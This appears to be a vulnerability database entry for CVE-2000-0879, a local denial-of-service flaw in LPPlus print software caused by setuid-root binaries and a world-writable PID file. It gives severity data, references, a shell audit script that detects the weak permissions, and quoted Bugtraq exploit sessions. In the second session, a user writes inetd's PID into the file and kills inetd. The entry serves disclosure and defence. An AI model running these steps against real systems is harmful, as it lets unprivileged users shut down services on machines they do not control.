CVE-2000-0879
CVSS 2.1
Published: 2000-11-14 00:00:00
Last revised: 2008-09-05 16:22:05

[Original] LPPlus programs dccsched, dcclpdser, dccbkst, dccshut, dcclpdshut, and dccbkstshut are installed setuid root and world executable, which allows arbitrary local users to start and stop various LPD services.


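[CNNVD] LPPlus Permissions DoS Vulnerability (CNNVD-200011-043)

        The LPPlus programs dccsched, dcclpdser, dccbkst, dccshut, dcclpdshut, and dccbkstshut are installed setuid root and world-executable, which any local user can use to start and stop various LPD services.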

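- CVSS (Base Score)

CVSS score: 2.1 [LOW]
Confidentiality impact: NONE [no impact on the confidentiality of the system]
Integrity impact: NONE [no impact on the integrity of the system]
Availability impact: PARTIAL [may cause reduced performance or interrupted access to resources]
Access complexity: LOW [exploitation has no access restrictions]
Access vector: LOCAL [exploitation requires physical access or a local account]
Authentication: NONE [exploitation requires no authentication]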

- CPE (Affected Platforms and Products)

cpe:/a:plus_technologies:lpplus:3.2.2
cpe:/a:plus_technologies:lpplus:3.3

- OVAL (Technical Details for Detection)

No related OVAL definitions found

- Official Database Links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0879
(Official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2000-0879
(Official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200011-043
(Official data source) CNNVD

- Other Links and Resources

http://xforce.iss.net/static/5199.php
(UNKNOWN)  XF  lpplus-permissions-dos
http://www.securityfocus.com/bid/1643
(VENDOR_ADVISORY)  BID  1643
http://archives.neohapsis.com/archives/bugtraq/2000-08/0531.html
(VENDOR_ADVISORY)  BUGTRAQ  20000906 Multiple Security Holes in LPPlus

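- Vulnerability Information

LPPlus Permissions DoS Vulnerability
Low severity, Access Validation Error
2000-11-14 00:00:00 2005-10-20 00:00:00
Local
        The LPPlus programs dccsched, dcclpdser, dccbkst, dccshut, dcclpdshut, and dccbkstshut are installed setuid root and world-executable, which any local user can use to start and stop various LPD services.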

- Advisories and Patches

        Currently the SecurityFocus staff are not aware of any vendor supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com.

- Vulnerability Information

13741
LPPlus dccsched Permission Weakness Arbitrary LPD Process Manipulation

- Vulnerability Description

Unknown or Incomplete

- Timeline

2000-09-06 Unknown
Unknown Unknown

- Solution

Unknown or Incomplete

- Related References

- Vulnerability Credit

Unknown or Incomplete

- Vulnerability Information

LPPlus Permissions DoS Vulnerabilities
Access Validation Error 1643
No Yes
2000-09-06 12:00:00 2009-07-11 02:56:00
This vulnerability was posted to bugtraq by Dixie Flatline <echo8@firest0rm.org> on Wed, 6 Sep 2000

- Affected Versions

Plus Technologies LPPlus 3.3
Plus Technologies LPPlus 3.2.2

- Discussion

Vulnerability #1: Several files that are part of the LPPlus print management system are installed setuid root by default. These files include:

$LPHOME/bin/dccsched
$LPHOME/bin/dcclpdser
$LPHOME/bin/dccbkst

These start the scheduler, LPD server and network status daemons.

$LPHOME/bin/dccshut
$LPHOME/bin/dcclpdshut
$LPHOME/bin/dccbkstshut

These stop the same services.

By default, all six may be run by a user of any privilege level, allowing any user to start and stop printing services, regardless of userid or group.

Vulnerability #2: $LPHOME/system/lpdprocess is created mode 777. This file contains the process ID of the dcclpdser process. If a user replaces the PID in $LPHOME/system/lpdprocess with the PID of a target process and then runs $LPHOME/bin/dcclpdshut, the signal goes to that process instead. Because the file is world-writable and dcclpdshut is executable by any user, any user can send signal 2 (SIGINT) to any process, thereby shutting it down.
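
An audit check for the two weaknesses described above, added here as an example (not code from the advisory or the vendor): it flags any of the six binaries that is setuid, owned by root and world-executable, and an lpdprocess file that is world-writable. The function name, finding labels and optional owner argument are assumptions; the check on the system directory goes one step beyond the page, since a world-writable parent directory without the sticky bit lets the PID file be replaced even when the file itself is locked down.

```shell
#!/bin/sh
# Added example: audit an LPPlus install for the permission weaknesses above.
# Assumptions: the $LPHOME layout shown on the page; all names here are hypothetical.
# Usage: audit_lpplus /opt/lpplus

LPPLUS_SUID_BINS="dccsched dcclpdser dccbkst dccshut dcclpdshut dccbkstshut"

# audit_lpplus LPHOME [OWNER]
# Prints one finding per line. Returns 0 when clean, 1 when anything was found.
# OWNER defaults to root; it is a parameter only so the check can be exercised
# on a scratch directory without root privileges.
audit_lpplus() {
    lphome=$1
    owner=${2:-root}
    findings=0

    for name in $LPPLUS_SUID_BINS; do
        bin="$lphome/bin/$name"
        [ -f "$bin" ] || continue
        # Weakness #1: setuid bit (4000) plus execute-for-others (0001).
        if [ -n "$(find "$bin" -prune -user "$owner" \
                   -perm -4000 -perm -0001 -print)" ]; then
            echo "SUID_WORLD_EXEC $bin"
            findings=$((findings + 1))
        fi
    done

    pidfile="$lphome/system/lpdprocess"
    # Weakness #2: write-for-others (0002) on the file dcclpdshut reads the PID from.
    if [ -f "$pidfile" ] && \
       [ -n "$(find "$pidfile" -prune -perm -0002 -print)" ]; then
        echo "WORLD_WRITABLE_PIDFILE $pidfile"
        findings=$((findings + 1))
    fi

    sysdir="$lphome/system"
    # Beyond the page: a world-writable directory without the sticky bit (1000)
    # allows the PID file to be deleted and recreated by anyone.
    if [ -d "$sysdir" ] && \
       [ -n "$(find "$sysdir" -prune -perm -0002 ! -perm -1000 -print)" ]; then
        echo "WORLD_WRITABLE_DIR $sysdir"
        findings=$((findings + 1))
    fi

    [ "$findings" -eq 0 ]
}
```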

- Exploit

The following exploits were excerpted verbatim from the original bugtraq post, referenced in the credit section:

Vulnerability #1:

$ id
uid=600(test) gid=300(users)
$ ps -ef|grep dcc
test 26357 26351 0 18:18:06 pts/0 0:00 grep dcc
root 26262 1 0 17:41:50 ? 0:01 /opt/lpplus/bin/dccsched
root 26272 1 0 17:42:03 ? 0:00 /opt/lpplus/bin/dcclpdser
root 26276 1 0 17:42:14 ? 0:00 /opt/lpplus/bin/dccbkst
$ dccbkstshut
$ dcclpdshut
LPD048E Signal sent to dcclpdser to shut down.
$ dccshut
LPP054I LP Plus scheduler ordered to shutdown.
$ ps -ef|grep dcc
test 26253 26239 0 17:39:45 pts/0 0:00 grep dcc
$

Vulnerability #2

$ id
uid=600(test) gid=300(users)
$ ps -ef|grep inet
test 26285 26279 0 17:42:42 pts/0 0:00 grep inet
root 12276 1 0 Aug 22 ? 0:00 /usr/sbin/inetd -s
$ cat > $LPHOME/system/lpdprocess
12276
^D
$ dcclpdshut
LPD048E Signal sent to dcclpdser to shut down.
$ ps -ef|grep inet
test 26291 26279 0 17:45:17 pts/0 0:00 grep inet
$

- Solution

Currently the SecurityFocus staff are not aware of any vendor supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com.

- Related References

 

 
